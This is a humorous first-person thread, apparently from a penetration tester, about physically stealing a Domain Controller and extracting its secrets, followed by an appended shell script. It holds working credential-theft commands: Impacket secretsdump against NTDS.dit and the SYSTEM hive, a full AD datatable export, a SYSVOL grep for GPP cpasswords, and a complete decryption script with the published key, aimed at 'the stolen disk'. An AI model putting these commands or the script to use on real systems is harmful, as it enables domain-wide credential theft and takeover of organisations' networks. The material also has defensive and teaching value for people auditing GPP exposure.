Well... a funny thing happened.
I stole a Domain Controller.
Like... physically stole it. I have it here with me. It's... well. It's unencrypted. I can mount it like a hard drive.
Now to figure out how to get info, such as user lists, out of it...
I've only interacted with DCs from domain-connected computers using 'net' commands and PowerShell...
I've even remotely connected to DCs and interacted with Active Directory using Remote Desktop Protocol...
But I& #39;ve never physically stolen and mounted a DC before.
First thing, I might as well grab the NTDS.dit file and pull off hashes.
- That& #39;s found in: ...\Windows\NTDS\NTDS.dit
Need the system hive as well...
- That& #39;s found in: ...\Windows\System32\config\SYSTEM
Drag those over to my own host.
Impacket has a nice script to pull domain user accounts and hashes from local files. Thanks Impacket!!!
~/$ python secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -outputfile lol.hash
Push those to my hashcracker....
https://github.com/SecureAuthCorp/impacket/blob/c328de825265df12ced44d14b36c688cd9973f5c/examples/secretsdump.py
Alright. That gives me internal usernames and hashes. But I don't have the user information.
Normally I'd do a:
C:\> net user <username> /domain
Or pull every user out via LDAP. Or something similar.
But how do I get the Active Directory user info from these files?!
Seriously... I have no idea.
Brb while I duckduckgo this shit.
Also, don& #39;t ask about how I got the physical server rack. They slide out of the cabinet just fine, thank you!
Also also, running with a 4U rack "under" your arm is ungainly. Shit's heavy and bulky, yo.
Oh Lady Discordia... this NTDS.dit is huge....
What sort of out-of-the-way branch office needs one this large?
Ok!!! I dumped everything!
I used Impacket's 'esentutl' Python port & dumped all of NTDS.dit into a text file. Grepped for Employee Name, Email, Title, &c.
~/$ python esentutl.py ~/Loot/NTDS.dit export -table datatable > allTheThings.txt
https://github.com/SecureAuthCorp/impacket/blob/master/examples/esentutl.py
Oh... Umm...
@UK_Daniel_Card reminded me to check GPP. So, I grepped SYSVOL (C:\Windows\SYSVOL\):
~/$ grep -r cpassword *
And found the cipher text for every workstations' Local Admin password. Decrypted it with:
~/$ gpp-decrypt "<cpasswordcipher>"
I am now depressed.
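What gpp-decrypt does is no secret: every Group Policy Preferences cpassword is AES-256-CBC under a key Microsoft published in MS-GPPREF, with an all-zero IV and a UTF-16LE plaintext, base64-encoded with the trailing "=" padding stripped. The script below is an added example, not part of the thread and not gpp-decrypt's own code; it reproduces the decryption with openssl(1) and iconv(1), walks a SYSVOL tree for cpassword attributes, and builds its own sample Groups.xml at run time (the sample is constructed, not copied from a real domain). The mount path in the usage note is assumed. One caveat on the thread's `grep -r cpassword *`: Groups.xml is the usual hit, but Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml carry the same attribute, so grep the whole Preferences tree, not just the Groups directory.

```shell
#!/bin/sh
# Added example, not from the thread or from gpp-decrypt. Mirrors what
# gpp-decrypt does using openssl(1) and iconv(1): AES-256-CBC with the key
# Microsoft published in MS-GPPREF, all-zero IV, UTF-16LE plaintext, and the
# ciphertext base64-encoded with its "=" padding stripped. Requires openssl
# and iconv on PATH.

GPP_KEY='4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'
ZERO_IV='00000000000000000000000000000000'

# cpassword values drop the base64 "=" padding; put it back so decoders accept it.
b64_repad() {
    s=$1
    while [ $(( ${#s} % 4 )) -ne 0 ]; do s="$s="; done
    printf '%s' "$s"
}

# $1: cpassword attribute value -> plaintext password on stdout.
# openssl strips the PKCS#7 padding; iconv turns UTF-16LE into UTF-8.
gpp_decrypt() {
    b64_repad "$1" | openssl base64 -d -A \
      | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$ZERO_IV" \
      | iconv -f UTF-16LE -t UTF-8
}

# Inverse direction, used here only to build a sample (the DC does this when
# an admin types a password into a Preferences item).
gpp_encrypt() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE \
      | openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$ZERO_IV" \
      | openssl base64 -A | tr -d '='
}

# $1: Preferences XML file -> every non-empty cpassword value, one per line.
# Returns 0 even when the file has none, so it can be used inside loops.
extract_cpasswords() {
    grep -o 'cpassword="[^"]\{1,\}"' "$1" 2>/dev/null \
      | sed 's/^cpassword="//; s/"$//' || :
}

# $1: SYSVOL root (mounted image) -> "<file><TAB><plaintext>" per cpassword.
# Walks all XML, not just Groups.xml: Services, ScheduledTasks, DataSources,
# Drives and Printers items embed the same attribute.
dump_sysvol_cpasswords() {
    find "$1" -type f -name '*.xml' | while read -r f; do
        extract_cpasswords "$f" | while read -r c; do
            printf '%s\t%s\n' "$f" "$(gpp_decrypt "$c")"
        done
    done
}

# Constructed sample: a trimmed Groups.xml whose cpassword is generated above,
# so nothing here is copied from a real SYSVOL.
SAMPLE_DIR=$(mktemp -d)
SAMPLE_XML="$SAMPLE_DIR/Groups.xml"
cat > "$SAMPLE_XML" <<EOF
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)">
    <Properties action="U" cpassword="$(gpp_encrypt 'Local*P4ssword!')" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
</Groups>
EOF

dump_sysvol_cpasswords "$SAMPLE_DIR"
```

On the stolen disk, point it at the mounted SYSVOL (path assumed): `dump_sysvol_cpasswords /mnt/dc/Windows/SYSVOL`. Every line that comes back is a local administrator password that was world-readable to any domain user for as long as that policy existed.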